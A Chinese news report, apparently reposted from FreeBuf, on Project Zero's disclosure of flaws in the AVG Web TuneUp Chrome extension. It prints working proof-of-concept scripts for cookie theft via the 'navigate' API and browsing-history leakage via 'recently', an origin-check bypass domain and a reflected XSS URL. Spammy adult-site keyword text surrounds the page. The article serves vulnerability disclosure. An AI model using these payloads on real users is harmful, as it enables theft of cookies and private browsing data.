成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

谷歌瀏覽器插件曝多個高危漏洞,影響900萬用戶

安全
今年8月15日, 來自project zero的成員Tavis提交了谷歌瀏覽器插件 AVG Web TuneUp的多個漏洞,由于該插件活躍用戶約900萬,所以影響范圍非常廣。

這個插件添加了很多的api用來操作谷歌瀏覽器,比如可以輕易的劫持搜索框和新標簽頁。而由于其安裝過程十分復雜,所以能夠逃避谷歌惡意軟件的檢查,特別是能夠逃避谷歌瀏覽器“阻止濫用擴展的API”的檢查。

事實上其中的很多api是有問題的,攻擊者可以通過構造payload成功盜取用戶在avg.com上的cookie,還可以獲取用戶的瀏覽記錄以及其他的私人數據,甚至有可能成功實施任意命令執行。

攻擊手法

Tavis在給廠商的郵件中列舉了幾種攻擊手法:"navigate" API 將會導致一個通用的跨域xss漏洞,attacker.com可以跨域讀取訪問者的mail.google.com的郵件或者是來自于其他網站的數據。

  1. <script> 
  2.     for (i = 0; i < 256; i++) { 
  3.         window.postMessage({ origin: "web", action: "navigate", data: { 
  4.            url: "javascript:document.location.hostname.endsWith('.avg.com')" 
  5.                 + "?" 
  6.                     + "alert(document.domain + ':' +document.cookie)" 
  7.                 + ":" 
  8.                     + "false"
  9.            tabID: i 
  10.         }}, "*"); 
  11.     } 
  12. </script> 

 

以上代碼為Tavis給的poc

通過 window.postMessage(允許跨域通信的javascript api) 不間斷的向 AVG: "Web TuneUP”插件發起請求,請求的數據為:

  1. { origin: "web", action: "navigate", data: {url:"javascript:document.location.hostname.endsWith('.avg.com')""?""alert(document.domain + ':' +document.cookie)"":""false",tabID: i}} 

當用戶的標簽頁在訪問avg.com網站時,將爆破以.avg.com結尾的網站的當前域名和cookie值。"recently" api將會泄露當前用戶的瀏覽記錄

  1. <script> 
  2. window.addEventListener("message", receiveMessage, false); 
  3. window.postMessage({ from: "web", to: "content", method: "recently" }, "*"
  4.   
  5. function receiveMessage(event) 
  6.     if (event.data != undefined && event.data.historyItems != undefined) { 
  7.         var obj = JSON.parse(event.data.historyItems); 
  8.   
  9.         document.write("Here is a list of websites you've been visiting"); 
  10.         document.write("<br>"); 
  11.         for (i in obj) { 
  12.             var d = new Date(obj[i]); 
  13.             document.write("<a href=" + i + ">" + i + "</a> on " + d); 
  14.             document.write("<br>"); 
  15.         } 
  16.     } 
  17. </script> 

 

以上代碼為Tavis給的poc

通過window.postMessage向插件的"recently"API發起請求獲取當前用戶的瀏覽記錄,本地監聽事件來獲取返回的數據,然后輸出數據。

隨后廠商對此進行了修復,但是由于修復的不對,又被Tavis繞過了。修復的代碼中增加了判斷

  1. var match = event.origin.match(/https?:\/\/.*\.avg\.com/i); 
  2.   
  3. if (match ! null { 
  4. ... 

判斷來源是不是包含".avg.com",但是這個很容易被繞過。比如https://www.avg.com.www.attacker.com這個域名就能繞過這個限定,繼續實施上面提到的兩個攻擊。又會因為上面的對協議的判斷是既支持http又支持https,于是又產生了“中間人攻擊”這個問題。

廠商對此又進行了修復,這次限制了域名必須為"mysearch.avg.com"和"webtuneup.avg.com" 。但通過下面這個xss,他又可以對用戶數據進行竊取:

http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

責任編輯:何妍 來源: FreeBuf
相關推薦

2023-04-04 22:20:53

2011-05-13 18:00:30

2022-12-08 09:47:29

2021-04-14 21:40:49

谷歌Chrome瀏覽器

2015-03-13 19:22:03

2020-12-09 09:32:03

漏洞黑客瀏覽器

2015-03-14 10:30:58

谷歌漏洞信息泄露

2015-05-07 14:57:33

瀏覽器

2022-01-17 12:46:05

API漏洞應用程序安全

2009-10-19 23:25:04

2023-05-08 19:28:11

2022-02-17 16:03:10

Chrome安全漏洞瀏覽器

2010-01-21 11:31:53

火狐Chrome

2013-11-08 09:10:23

2022-09-05 11:25:22

惡意瀏覽器Chrome惡意擴展

2020-06-19 14:55:14

信息泄漏惡意軟件攻擊

2015-02-26 13:57:55

2019-07-21 08:33:53

瀏覽器擴展插件安全

2022-05-05 14:01:02

DNS高危漏洞uClibc

2012-09-27 11:50:31

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 三级黄色大片网站 | 精品一区二区三区免费毛片 | 精品久久一区 | 野狼在线社区2017入口 | 亚洲成人午夜电影 | 日日干夜夜操 | a级在线免费视频 | 国产精久久久 | 欧美一区二区久久 | 久久男人 | 黄色大片在线免费观看 | 三级黄片毛片 | 日韩久久精品视频 | 91在线观看免费 | 91看片在线 | av中文在线播放 | 天堂在线中文 | 久久免费看 | 欧美国产中文 | a国产一区二区免费入口 | 精品国产一区二区三区性色av | 一区二区三区视频 | 欧美福利 | 亚洲网在线 | 在线观看深夜视频 | 国产资源视频 | 一区二区av| 国产成人精品一区二区三区四区 | 日日摸夜夜爽人人添av | 亚洲 欧美 综合 | 瑞克和莫蒂第五季在线观看 | 一级免费毛片 | 精品久草 | 宅女噜噜66国产精品观看免费 | 国产精品毛片一区二区三区 | 久久成人精品 | 色爽女| 日韩精品在线观看一区二区 | 成人国产精品一级毛片视频毛片 | 日韩精品视频在线观看一区二区三区 | 久久久免费少妇高潮毛片 |